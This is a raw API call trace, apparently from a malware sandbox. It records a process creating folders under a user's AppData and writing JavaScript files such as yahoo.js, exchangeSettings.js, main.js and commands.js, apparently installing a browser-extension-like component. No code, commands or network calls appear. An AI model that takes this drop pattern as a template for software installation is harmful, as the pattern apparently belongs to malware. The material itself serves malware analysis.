[0164.766] EtwEventActivityIdControl () returned 0x0 [0164.770] EtwEventActivityIdControl () returned 0x0 [0164.770] EtwEventActivityIdControl () returned 0x0 [0164.770] EtwEventActivityIdControl () returned 0x0 [0164.771] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\mails")) returned 0xffffffff [0164.772] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2d [0164.772] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src", nBufferLength=0x2d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src", lpFilePart=0x0) returned 0x2c [0164.772] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x33 [0164.772] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails", nBufferLength=0x33, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails", lpFilePart=0x0) returned 0x32 [0164.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e0b8) returned 1 [0164.772] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\mails"), fInfoLevelId=0x0, lpFileInformation=0x5a0e37c | out: lpFileInformation=0x5a0e37c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0164.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e0b4) returned 1 [0164.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e0b8) returned 1 [0164.772] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\mails"), fInfoLevelId=0x0, lpFileInformation=0x5a0e37c | out: lpFileInformation=0x5a0e37c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0164.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e0b4) returned 1 [0164.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e0b8) returned 1 [0164.773] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src"), fInfoLevelId=0x0, lpFileInformation=0x5a0e37c | out: lpFileInformation=0x5a0e37c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x839ab040, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83b27e00, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83b27e00, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0164.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e0b4) returned 1 [0164.773] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\mails"), lpSecurityAttributes=0x0) returned 1 [0164.774] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x33 [0164.774] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails", nBufferLength=0x33, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails", lpFilePart=0x0) returned 0x32 [0164.774] EtwEventActivityIdControl () returned 0x0 [0164.775] EtwEventActivityIdControl () returned 0x0 [0164.775] EtwEventActivityIdControl () returned 0x0 [0164.775] EtwEventActivityIdControl () returned 0x0 [0164.775] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails\\yahoo.js", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3c [0164.775] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails\\yahoo.js", nBufferLength=0x3c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails\\yahoo.js", lpFilePart=0x0) returned 0x3b [0164.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0164.776] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails\\yahoo.js" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\mails\\yahoo.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.776] GetFileType (hFile=0x36c) returned 0x1 [0164.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0164.777] GetFileType (hFile=0x36c) returned 0x1 [0164.777] WriteFile (in: hFile=0x36c, lpBuffer=0x6c37e30*, nNumberOfBytesToWrite=0x3b6e7, lpNumberOfBytesWritten=0x5a0e788, lpOverlapped=0x0 | out: lpBuffer=0x6c37e30*, lpNumberOfBytesWritten=0x5a0e788*=0x3b6e7, lpOverlapped=0x0) returned 1 [0164.783] CloseHandle (hObject=0x36c) returned 1 [0164.790] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.791] EtwEventActivityIdControl () returned 0x0 [0164.791] EtwEventActivityIdControl () returned 0x0 [0164.791] EtwEventActivityIdControl () returned 0x0 [0164.791] EtwEventActivityIdControl () returned 0x0 [0164.792] EtwEventActivityIdControl () returned 0x0 [0164.792] EtwEventActivityIdControl () returned 0x0 [0164.792] EtwEventActivityIdControl () returned 0x0 [0164.792] EtwEventActivityIdControl () returned 0x0 [0164.792] EtwEventActivityIdControl () returned 0x0 [0164.793] EtwEventActivityIdControl () returned 0x0 [0164.793] EtwEventActivityIdControl () returned 0x0 [0164.795] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e244) returned 1 [0164.796] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions"), fInfoLevelId=0x0, lpFileInformation=0x5a0e508 | out: lpFileInformation=0x5a0e508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x839d11a0, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83c327a0, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83c327a0, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0164.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e240) returned 1 [0164.796] EtwEventActivityIdControl () returned 0x0 [0164.796] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0164.796] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\exchangeSettings.js" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions\\exchangesettings.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.797] GetFileType (hFile=0x36c) returned 0x1 [0164.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0164.797] GetFileType (hFile=0x36c) returned 0x1 [0164.797] WriteFile (in: hFile=0x36c, lpBuffer=0x276e094*, nNumberOfBytesToWrite=0xfb1, lpNumberOfBytesWritten=0x5a0e75c, lpOverlapped=0x0 | out: lpBuffer=0x276e094*, lpNumberOfBytesWritten=0x5a0e75c*=0xfb1, lpOverlapped=0x0) returned 1 [0164.798] CloseHandle (hObject=0x36c) returned 1 [0164.802] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.802] EtwEventActivityIdControl () returned 0x0 [0164.802] EtwEventActivityIdControl () returned 0x0 [0164.803] EtwEventActivityIdControl () returned 0x0 [0164.804] EtwEventActivityIdControl () returned 0x0 [0164.805] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.805] EtwEventActivityIdControl () returned 0x0 [0164.805] EtwEventActivityIdControl () returned 0x0 [0164.805] EtwEventActivityIdControl () returned 0x0 [0164.807] EtwEventActivityIdControl () returned 0x0 [0164.808] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.808] EtwEventActivityIdControl () returned 0x0 [0164.808] EtwEventActivityIdControl () returned 0x0 [0164.808] EtwEventActivityIdControl () returned 0x0 [0164.815] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\content" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\content")) returned 0xffffffff [0164.816] EtwEventActivityIdControl () returned 0x0 [0164.816] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.816] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.816] EtwEventActivityIdControl () returned 0x0 [0164.816] EtwEventActivityIdControl () returned 0x0 [0164.817] EtwEventActivityIdControl () returned 0x0 [0164.821] EtwEventActivityIdControl () returned 0x0 [0164.821] EtwEventActivityIdControl () returned 0x0 [0164.821] EtwEventActivityIdControl () returned 0x0 [0164.822] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\content" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\content")) returned 0xffffffff [0164.822] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2d [0164.822] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src", nBufferLength=0x2d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src", lpFilePart=0x0) returned 0x2c [0164.822] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\content", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x35 [0164.823] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\content", nBufferLength=0x35, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\content", lpFilePart=0x0) returned 0x34 [0164.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e0b8) returned 1 [0164.823] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\content" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\content"), fInfoLevelId=0x0, lpFileInformation=0x5a0e37c | out: lpFileInformation=0x5a0e37c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0164.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e0b4) returned 1 [0164.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e0b8) returned 1 [0164.823] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\content" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\content"), fInfoLevelId=0x0, lpFileInformation=0x5a0e37c | out: lpFileInformation=0x5a0e37c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0164.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e0b4) returned 1 [0164.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e0b8) returned 1 [0164.823] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src"), fInfoLevelId=0x0, lpFileInformation=0x5a0e37c | out: lpFileInformation=0x5a0e37c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x839ab040, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83d16fe0, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83d16fe0, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0164.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e0b4) returned 1 [0164.823] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\content" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\content"), lpSecurityAttributes=0x0) returned 1 [0164.824] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\content", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x35 [0164.824] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\content", nBufferLength=0x35, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\content", lpFilePart=0x0) returned 0x34 [0164.825] EtwEventActivityIdControl () returned 0x0 [0164.825] EtwEventActivityIdControl () returned 0x0 [0164.825] EtwEventActivityIdControl () returned 0x0 [0164.825] EtwEventActivityIdControl () returned 0x0 [0164.825] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\content\\main.js", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0164.825] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\content\\main.js", nBufferLength=0x3d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\content\\main.js", lpFilePart=0x0) returned 0x3c [0164.825] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0164.825] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\content\\main.js" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\content\\main.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.826] GetFileType (hFile=0x36c) returned 0x1 [0164.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0164.826] GetFileType (hFile=0x36c) returned 0x1 [0164.826] WriteFile (in: hFile=0x36c, lpBuffer=0x6e2f990*, nNumberOfBytesToWrite=0x17760, lpNumberOfBytesWritten=0x5a0e788, lpOverlapped=0x0 | out: lpBuffer=0x6e2f990*, lpNumberOfBytesWritten=0x5a0e788*=0x17760, lpOverlapped=0x0) returned 1 [0164.829] CloseHandle (hObject=0x36c) returned 1 [0164.833] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.833] EtwEventActivityIdControl () returned 0x0 [0164.833] EtwEventActivityIdControl () returned 0x0 [0164.833] EtwEventActivityIdControl () returned 0x0 [0164.836] EtwEventActivityIdControl () returned 0x0 [0164.837] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.837] EtwEventActivityIdControl () returned 0x0 [0164.837] EtwEventActivityIdControl () returned 0x0 [0164.838] EtwEventActivityIdControl () returned 0x0 [0164.839] EtwEventActivityIdControl () returned 0x0 [0164.840] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.840] EtwEventActivityIdControl () returned 0x0 [0164.840] EtwEventActivityIdControl () returned 0x0 [0164.841] EtwEventActivityIdControl () returned 0x0 [0164.848] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions")) returned 0x2010 [0164.848] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0164.848] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", nBufferLength=0x37, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", lpFilePart=0x0) returned 0x36 [0164.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e244) returned 1 [0164.848] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions"), fInfoLevelId=0x0, lpFileInformation=0x5a0e508 | out: lpFileInformation=0x5a0e508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x839d11a0, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83d3d140, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83d3d140, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0164.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e240) returned 1 [0164.849] EtwEventActivityIdControl () returned 0x0 [0164.849] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\extensions.js", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x45 [0164.849] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\extensions.js", nBufferLength=0x45, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\extensions.js", lpFilePart=0x0) returned 0x44 [0164.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0164.849] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\extensions.js" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions\\extensions.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.850] GetFileType (hFile=0x36c) returned 0x1 [0164.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0164.850] GetFileType (hFile=0x36c) returned 0x1 [0164.850] WriteFile (in: hFile=0x36c, lpBuffer=0x279df90*, nNumberOfBytesToWrite=0x1df, lpNumberOfBytesWritten=0x5a0e75c, lpOverlapped=0x0 | out: lpBuffer=0x279df90*, lpNumberOfBytesWritten=0x5a0e75c*=0x1df, lpOverlapped=0x0) returned 1 [0164.852] CloseHandle (hObject=0x36c) returned 1 [0164.854] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.854] EtwEventActivityIdControl () returned 0x0 [0164.854] EtwEventActivityIdControl () returned 0x0 [0164.854] EtwEventActivityIdControl () returned 0x0 [0164.855] EtwEventActivityIdControl () returned 0x0 [0164.856] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.856] EtwEventActivityIdControl () returned 0x0 [0164.856] EtwEventActivityIdControl () returned 0x0 [0164.856] EtwEventActivityIdControl () returned 0x0 [0164.858] EtwEventActivityIdControl () returned 0x0 [0164.859] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.859] EtwEventActivityIdControl () returned 0x0 [0164.859] EtwEventActivityIdControl () returned 0x0 [0164.859] EtwEventActivityIdControl () returned 0x0 [0164.867] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions")) returned 0x2010 [0164.867] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0164.867] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", nBufferLength=0x37, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", lpFilePart=0x0) returned 0x36 [0164.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e244) returned 1 [0164.867] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions"), fInfoLevelId=0x0, lpFileInformation=0x5a0e508 | out: lpFileInformation=0x5a0e508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x839d11a0, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83dd56c0, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83dd56c0, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0164.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e240) returned 1 [0164.867] EtwEventActivityIdControl () returned 0x0 [0164.868] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\commands.js", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x43 [0164.868] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\commands.js", nBufferLength=0x43, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\commands.js", lpFilePart=0x0) returned 0x42 [0164.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0164.868] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\commands.js" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions\\commands.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.869] GetFileType (hFile=0x36c) returned 0x1 [0164.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0164.869] GetFileType (hFile=0x36c) returned 0x1 [0164.869] WriteFile (in: hFile=0x36c, lpBuffer=0x27b1f5c*, nNumberOfBytesToWrite=0xff7, lpNumberOfBytesWritten=0x5a0e75c, lpOverlapped=0x0 | out: lpBuffer=0x27b1f5c*, lpNumberOfBytesWritten=0x5a0e75c*=0xff7, lpOverlapped=0x0) returned 1 [0164.872] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.872] EtwEventActivityIdControl () returned 0x0 [0164.872] EtwEventActivityIdControl () returned 0x0 [0164.873] EtwEventActivityIdControl () returned 0x0 [0164.874] EtwEventActivityIdControl () returned 0x0 [0164.874] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.875] EtwEventActivityIdControl () returned 0x0 [0164.875] EtwEventActivityIdControl () returned 0x0 [0164.875] EtwEventActivityIdControl () returned 0x0 [0164.876] EtwEventActivityIdControl () returned 0x0 [0164.877] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.877] EtwEventActivityIdControl () returned 0x0 [0164.877] EtwEventActivityIdControl () returned 0x0 [0164.877] EtwEventActivityIdControl () returned 0x0 [0164.889] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default")) returned 0x2010 [0164.889] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x29 [0164.889] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", nBufferLength=0x29, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", lpFilePart=0x0) returned 0x28 [0164.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e244) returned 1 [0164.889] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default"), fInfoLevelId=0x0, lpFileInformation=0x5a0e508 | out: lpFileInformation=0x5a0e508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8368b360, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83ca4bc0, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83ca4bc0, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 